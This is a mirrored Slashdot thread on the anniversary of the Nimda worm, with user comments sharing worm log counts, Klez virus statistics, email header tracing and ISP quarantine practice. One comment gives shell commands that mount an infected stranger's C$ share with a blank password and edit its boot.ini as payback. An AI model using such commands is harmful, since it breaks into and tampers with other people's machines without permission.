Slashdot Mirror

← Back to Stories (view on slashdot.org)

1 Year Anniversary of Nimda Outbreak

Posted by CmdrTaco on from the my-logs-hurt dept.

dots and loops writes "Today marks one year to the date that the nimda worm began making its way across the Internet." Hey, speaking of hilarious worms, I'm still getting 5-10 klez virus's a day! Yay Security!

10 of 289 comments (clear)

  1. Still kicking by JediTrainer · · Score: 5, Informative

    If anybody is interested, I've developed WormScan last year, which is a Java-based program (GPL) which can analyze your Apache log files for pretty much anything you want (just plug in your regular expressions). It detects Nimda and CR1+2 out of the box. It's easy to add your own entries to scan for.

    According to my logs (please be gentle), I've been hit 650 times yesterday.

    Shameless plug, yes. But it does the job and the users of WormScan seem to be pretty happy with it, judging from the emails I've gotten so far.

    --

    You can accomplish anything you set your mind to. The impossible just takes a little longer.
  2. Slapper by Dynamoo · · Score: 3, Informative
    Aww heck I hadn't realised Nimda was a year old.. maybe it's not a coincidence that Slapper is gearing up a huge P2P Apache-based worm for something.. maybe today?

    Where did I put my hard hard? I think I might be needing it.

    --
    Never email donotemail@WeAreSpammers.com
  3. Re:5-10? by Anonymous Coward · · Score: 0, Informative

    stats for a central server handling about 1000 email addresses over about a week (sendmail-milter/amavis/sophos):

    Virus: W32/Klez-H found 476 times (68 %)
    Virus: W32/Yaha-E found 99 times (14 %)
    Virus: W32/Sircam-A found 86 times (12 %)
    Virus: W32/Magistr-B found 16 times (2 %)
    Virus: W95/CIH-10xx found 3 times ( <1 %)
    Virus: W32/Nimda-A found 3 times ( <1 %)
    Virus: W32/Yaha-D found 1 times ( <1 %)
    Virus: W32/ElKern-A found 1 times ( <1 %)
    Virus: VBS/Redlof-A found 2 times ( <1 %)
    Virus: W32/Cervivec-A found 1 times ( <1 %)
    Virus: W32/Hybris-C found 1 times ( <1 %)
    Virus: W32/Weird-10240 found 1 times ( <1 %)
    Virus: W32/Hybris-B found 2 times ( <1 %)
    Virus: W32/Klez-E found 1 times ( <1 %)

  4. Re:NIMDA the sysadmins friend :-s a little anecdot by fruey · · Score: 2, Informative
    http://www.perl.com/language/misc/virus.html

    It's viruses.

    --
    Conversion Rate Optimisation French / English consultant
  5. Still getting hit by rossz · · Score: 5, Informative

    No doubt in celebration of the birthday, I got a number of nimda hits this morning.

    mount -t smbfs password= //xx.xx.xx.xx/C$ /mnt/dork
    vi /mnt/dork/boot.ini

    Change the boot delay to some huge number and the boot message to "Run a virus scanner, asshole".

    umount /mnt/dork

    --
    -- Will program for bandwidth
  6. Re:How to block Klez emails from my mailbox? by Draoi · · Score: 4, Informative
    Replying to the senders (the From: address) won't work, 'coz it's forged. Klez pulls email addresses from the victim's address book/inbox and uses them for the 'from'. You have to look deeper into the headers to find the culprit.

    Here's one I just got;

    From: webmaster <webmaster@msn.com>
    Date: Wed Sep 18, 2002 15:03:16 Europe/Dublin
    To: webmaster@christymoore.net
    Subject: User code here
    Return-Path: <tony_XXXXXXXX@oceanfree.net>
    Received: from bubble.oceanfree.net ([212.2.162.35]) by ddandd.com (8.11.6/8.11.6) with ESMTP id g8IEADp05002 for <webmaster@christymoore.net>; Wed, 18 Sep 2002 15:10:13 +0100
    Received: from [193.203.147.182] (helo=Qrxy) by bubble.oceanfree.net with smtp (Exim 3.33 #3) id 17rfQB-0002p3-00 for webmaster@christymoore.net; Wed, 18 Sep 2002 15:03:16 +0100
    Mime-Version: 1.0
    Content-Type: multipart/alternative; boundary=Z0z7O8r66243H01338eADBxj05jJ7LLMnHZ85
    Me ssage-Id: <E17rfQB-0002p3-00@bubble.oceanfree.net>
    Statu s:
    Attachments: There is 1 attachment
    Do you think this was sent by webmaster@msn.com? (I hear the jokes now!). In this case, the Return-path actually contained the victim's full mail address, which I've mercifully blanked ...
    --
    Alison

    "It is a miracle that curiosity survives formal education." - Albert Einstein

  7. Klez programmed to go off September 13 by Anonymous Coward · · Score: 2, Informative

    the reason why klez and its variants are still going strong now is because they are programmed to commence 'attacking' on September 13 (among other dates). lots of systems were infected but because the virus was dormant, they were undetected. since september 13, Klez has been in full force.

  8. Re:The most long-lived virus/worm/trojan? by shepherd_97850 · · Score: 2, Informative

    Here is some data from an isp mail server (out of 384k delivered messages) .41% of all mail traffic was the Klez virus. top 10 Viri by messages (percentage by delivered messages) 1144 ( 0.41) W32/Klez.h@MM 83 ( 0.03) W32/Nimda.htm 40 ( 0.01) W32/SirCam@MM 33 ( 0.01) W32/Magistr.b@MM 30 ( 0.01) W32/Hybris.gen@MM 23 ( 0.01) W32/Yaha.g@MM

  9. Re:reporting klez by Eric+Savage · · Score: 2, Informative

    You realize that Klez is a client virus right? Mailing abuse@ is only going to piss off the person reading and take time away from dealing with issues they have some control over.

    --

    This is not the greatest sig in the world, this is just a tribute.
  10. Re:reporting klez by leviramsey · · Score: 2, Informative

    It depends on the network you're emailing to. University IT departments, being knowledgeable, will tend to just immediately disable that computer's MAC address.

    For instance, UMass apparently tells the DHCP server to assign an IP address on one of the netblocks reserved for NAT and has the routers redirect any HTTP requests to a page saying that that computer's rights to access the network have been suspended and how to restore those rights (apply the patches, and inform the IT people, who presumably run a scan on your computer to determine whether you've patched).